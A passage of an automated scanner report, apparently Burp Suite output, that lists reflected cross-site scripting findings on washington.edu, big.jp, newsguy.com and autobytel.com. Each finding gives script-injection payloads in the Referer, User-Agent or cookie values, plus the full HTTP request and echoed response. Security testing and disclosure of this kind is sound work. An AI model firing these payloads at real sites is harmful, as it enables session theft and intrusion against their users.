<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83))&gt;e6e3afeb687/</b> wa
...[SNIP]...
<br>
Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2ae36<script>alert(1)</script>e3eb2d74228<br>
...[SNIP]...

4.1987. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53c75"><script>alert(1)</script>f39259fbf77 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=53c75"><script>alert(1)</script>f39259fbf77

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1412
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=53c75"><script>alert(1)</script>f39259fbf77">
...[SNIP]...

4.1988. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 69385<script>alert(1)</script>a6f6fa4a2dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=69385<script>alert(1)</script>a6f6fa4a2dc

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1404
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...
</script>a6f6fa4a2dc">http://www.google.com/search?hl=en&q=69385<script>alert(1)</script>a6f6fa4a2dc</a>
...[SNIP]...

4.1989. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of the Referer HTTP header is copied into the name of an HTML tag attribute. The payload 8b38e><script>alert(1)</script>88306eec07b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 8b38e><script>alert(1)</script>88306eec07b

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1260
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...
<img src=a onerror=alert(document.cookie, referer: 8b38e><script>alert(1)</script>88306eec07b.</br>
...[SNIP]...

4.1990. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload bf01d><script>alert(1)</script>a78c347ab3f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bf01d><script>alert(1)</script>a78c347ab3f

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1408
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...
<img src=a onerror=alert(document.cookie, referer: http://www.google.com/search?hl=en&q=bf01d><script>alert(1)</script>a78c347ab3f.</br>
...[SNIP]...

4.1991. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a38ec<script>alert(1)</script>b29724d166e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a38ec<script>alert(1)</script>b29724d166e
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1177
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...
<br>
Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a38ec<script>alert(1)</script>b29724d166e<br>
...[SNIP]...

4.1992. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 63899<script>alert(1)</script>2920147a5c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=63899<script>alert(1)</script>2920147a5c6

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1451
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie)&gt;e6e3afeb687/</b> was not found or
...[SNIP]...
</script>2920147a5c6">http://www.google.com/search?hl=en&q=63899<script>alert(1)</script>2920147a5c6</a>
...[SNIP]...

4.1993. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10da7"><script>alert(1)</script>2c7b19061dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=10da7"><script>alert(1)</script>2c7b19061dd

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1459
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie)&gt;e6e3afeb687/</b> was not found or
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=10da7"><script>alert(1)</script>2c7b19061dd">
...[SNIP]...

4.1994. http://www.washington.edu/alpinef972ae6e3afeb687/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c9a58<script>alert(1)</script>c39d6e840fd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c9a58<script>alert(1)</script>c39d6e840fd
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1224
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie)&gt;e6e3afeb687/</b> was not found or
...[SNIP]...
<br>
Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c9a58<script>alert(1)</script>c39d6e840fd<br>
...[SNIP]...

4.1995. http://www25.big.jp/~jam/leafnode+/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /~jam/leafnode+/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as text between TITLE tags. The payload c1b07</title><script>alert(1)</script>ccaaf7c0f74 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /~jam/leafnode+/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c1b07</title><script>alert(1)</script>ccaaf7c0f74

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:14 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2514
Connection: close
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>c1b07</title><script>alert(1)</script>ccaaf7c0f74 | www25.big.jp/~jam/leafnode+/</Title>
<Meta Http-equiv="content-type" Content="text/html; charset=utf-8">
<LINK href=
...[SNIP]...

4.1996. http://www25.big.jp/~jam/leafnode+/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /~jam/leafnode+/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30c8"><script>alert(1)</script>13cdfeef9c5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /~jam/leafnode+/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f30c8"><script>alert(1)</script>13cdfeef9c5

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:12 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2490
Connection: close
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>f30c8"><script>alert(1)</script>13cdfeef9c5 | www25.big.jp/~jam/leafnode+/</Title>
<Meta Http-equiv="content-type" Content="text/html; charset=utf-8">
<LINK href="/styl
...[SNIP]...
<Meta Name="keywords" Content="f30c8"><script>alert(1)</script>13cdfeef9c5">
...[SNIP]...

4.1997. http://newsguy.com/user_info.asp [DIGEST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /user_info.asp

Issue detail

The value of the DIGEST cookie is copied into the HTML document as plain text between tags. The payload a8a96<script>alert(1)</script>4d8999f6908 was submitted in the DIGEST cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /user_info.asp?0.2662578278686851 HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Referer: http://newsguy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256a8a96<script>alert(1)</script>4d8999f6908; session-id=07e5e76216ca9266b6006a1955c20780

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:03:20 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=041e224072a92fd25140de5fddcf5682; path=/
Content-Length: 118
Expires: Mon, 24 Jan 2011 22:03:19 GMT
Cache-Control: no-cache
Content-Type: text/html


DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256a8a96<script>alert(1)</script>4d8999f6908
USERID=
DNDDATA=+
MAILDATA=

4.1998. http://www.autobytel.com/ [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b40ac"%3balert(1)//0051c4cf45b was submitted in the BDATALIST cookie. This input was echoed as b40ac";alert(1)//0051c4cf45b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4b40ac"%3balert(1)//0051c4cf45b; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 71059


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4b40ac";alert(1)//0051c4cf45b";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "482E9FD5-C3E3-1C76-F4759E43
...[SNIP]...

4.1999. http://www.autobytel.com/ [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea9fc"%3balert(1)//a7580a5b82d was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as ea9fc";alert(1)//a7580a5b82d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=ea9fc"%3balert(1)//a7580a5b82d; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 71031
Expires: Mon, 24 Jan 2011 23:56:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:52 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

               s.prop8 = "home|mtu";
           
           //s.prop9 = "home|Search Engine Optimization Project|13148";
           s.prop10 = "home|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "ea9fc";alert(1)//a7580a5b82d||";
           
           s.prop14 = "home : Search Engine Optimization Project entry page";
           s.prop15 = "No Article|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "home||||||Search Engine Op
...[SNIP]...

4.2000. http://www.autobytel.com/ [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 85f6a<img%20src%3da%20onerror%3dalert(1)>f2e1e159d1b was submitted in the PV_CT cookie. This input was echoed as 85f6a<img src=a onerror=alert(1)>f2e1e159d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=285f6a<img%20src%3da%20onerror%3dalert(1)>f2e1e159d1b; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 78708
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:50:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:24 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:50:23 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
